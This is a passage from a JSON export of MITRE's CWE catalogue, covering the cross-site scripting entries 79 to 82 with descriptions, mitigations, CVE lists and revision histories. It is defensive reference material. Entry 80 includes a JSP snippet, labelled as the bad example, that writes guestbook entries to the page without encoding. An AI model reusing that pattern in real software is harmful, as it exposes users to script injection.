product.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0971"},{"Reference":"CVE-2008-5249","Description":"Stored XSS using a wiki page.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5249"},{"Reference":"CVE-2006-3568","Description":"Stored XSS in a guestbook application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3568"},{"Reference":"CVE-2006-3211","Description":"Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3211"},{"Reference":"CVE-2006-3295","Description":"Chain: library file is not protected against a direct request (CWE-425), leading to reflected XSS (CWE-79).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3295"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Cross-site scripting (XSS)"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Cross-site Scripting"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Cross-site scripting"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A1","Entry_Name":"Cross Site Scripting (XSS)","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A4","Entry_Name":"Cross-Site Scripting (XSS) Flaws","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":8,"Entry_Name":"Cross-site Scripting"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-79"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"209"}},{"attr":{"@_CAPEC_ID":"588"}},{"attr":{"@_CAPEC_ID":"591"}},{"attr":{"@_CAPEC_ID":"592"}},{"attr":{"@_CAPEC_ID":"63"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-709"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting)." Page 31"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 3: Web-Client Related Vulnerabilities (XSS)." Page 63"}},{"attr":{"@_External_Reference_ID":"REF-712"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 13, "Web-Specific Input Issues" Page 413"}},{"attr":{"@_External_Reference_ID":"REF-714"}},{"attr":{"@_External_Reference_ID":"REF-715"}},{"attr":{"@_External_Reference_ID":"REF-716"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-718"}},{"attr":{"@_External_Reference_ID":"REF-719"}},{"attr":{"@_External_Reference_ID":"REF-720"}},{"attr":{"@_External_Reference_ID":"REF-721"}},{"attr":{"@_External_Reference_ID":"REF-722"}},{"attr":{"@_External_Reference_ID":"REF-723"}},{"attr":{"@_External_Reference_ID":"REF-724"}},{"attr":{"@_External_Reference_ID":"REF-725"}},{"attr":{"@_External_Reference_ID":"REF-726"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, "Cross Site Scripting", Page 1071"}},{"attr":{"@_External_Reference_ID":"REF-956"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-79"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":"There can be a close relationship between XSS and CSRF (CWE-352). An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload. A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user\'s profile and add the attacker as a MySpace friend. MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause."},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"XSS flaws are very common in web applications, since they require a great deal of developer discipline to avoid them."}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, Observed_Examples, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Cross-site Scripting (XSS)","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Directives in a Web Page (aka \'Cross-site scripting\' (XSS))","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Preserve Web Page Structure (aka \'Cross-site Scripting\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Preserve Web Page Structure (\'Cross-site Scripting\')","attr":{"@_Date":"2010-06-21"}}]}},"80":{"attr":{"@_ID":"80","@_Name":"Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \\"<\\", \\">\\", and \\"&\\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.","Extended_Description":"This may allow such characters to be treated as control characters, which are executed client-side in the context of the user\'s session. Although this can be classified as an injection problem, the more pertinent issue is the improper conversion of such special characters to respective context-appropriate entities before displaying them to the user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, a guestbook comment isn\'t properly encoded, filtered, or otherwise neutralized for script-related tags before being displayed in a client browser.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"<% for (Iterator i = guestbook.iterator(); i.hasNext(); ) {","xhtml:div":{"#text":"Entry e = (Entry) i.next(); %><p>Entry #<%= e.getId() %></p><p><%= e.getText() %></p><%} %>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0938","Description":"XSS in parameter in a link.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0938"},{"Reference":"CVE-2002-1495","Description":"XSS in web-based email product via attachment filenames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1495"},{"Reference":"CVE-2003-1136","Description":"HTML injection in posted message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1136"},{"Reference":"CVE-2004-2171","Description":"XSS not quoted in error page.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2171"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Basic XSS"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"18"}},{"attr":{"@_CAPEC_ID":"193"}},{"attr":{"@_CAPEC_ID":"32"}},{"attr":{"@_CAPEC_ID":"86"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Description, Name"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Basic XSS","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Script-Related HTML Tags in a Web Page (Basic XSS)","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Script-Related HTML Tags in a Web Page (Basic XSS)","attr":{"@_Date":"2010-06-21"}}]}},"81":{"attr":{"@_ID":"81","@_Name":"Improper Neutralization of Script in an Error Message Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters that could be interpreted as web-scripting elements when they are sent to an error page.","Extended_Description":{"xhtml:p":["Error pages may include customized 403 Forbidden or 404 Not Found pages.","When an attacker can trigger an error that contains script syntax within the attacker\'s input, then cross-site scripting attacks may be possible."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"209","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"390","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Do not write user-controlled input to error pages."},{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0840","Description":"XSS in default error page from Host: header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0840"},{"Reference":"CVE-2002-1053","Description":"XSS in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1053"},{"Reference":"CVE-2002-1700","Description":"XSS in error page from targeted parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1700"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"XSS in error pages"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"198"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 11: Failure to Handle Errors Correctly." Page 183"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"XSS in Error Pages","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Directives in an Error Message Web Page","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Script in an Error Message Web Page","attr":{"@_Date":"2010-06-21"}}]}},"82":{"attr":{"@_ID":"82","@_Name":"Improper Neutralization of Script in Attributes of IMG Tags in a Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application does not neutralize or incorrectly neutralizes scripting elements within attributes of HTML IMG tags, such as the src attribute.","Extended_Description":"Attackers can embed XSS exploits into the values for IMG attributes (e.g. SRC) that is streamed and then executed in a victim\'s browser. Note that when the page is loaded into a user\'s browsers, the exploit will automatically execute.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"83","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-3211","Description":"Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3211"},{"Reference":"CVE-2002-1649","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1649"},{"Reference":"CVE-2002-1803","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1803"},{"Reference":"CVE-2002-1804","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1804"},{"Reference":"CVE-2002-1805","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1805"},{"Reference":"CVE-2002-1806","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1806"},{"Reference":"CVE-2002-1807","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1807"},{"Reference":"CVE-2002-1808","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1808"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Script in IMG tags"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 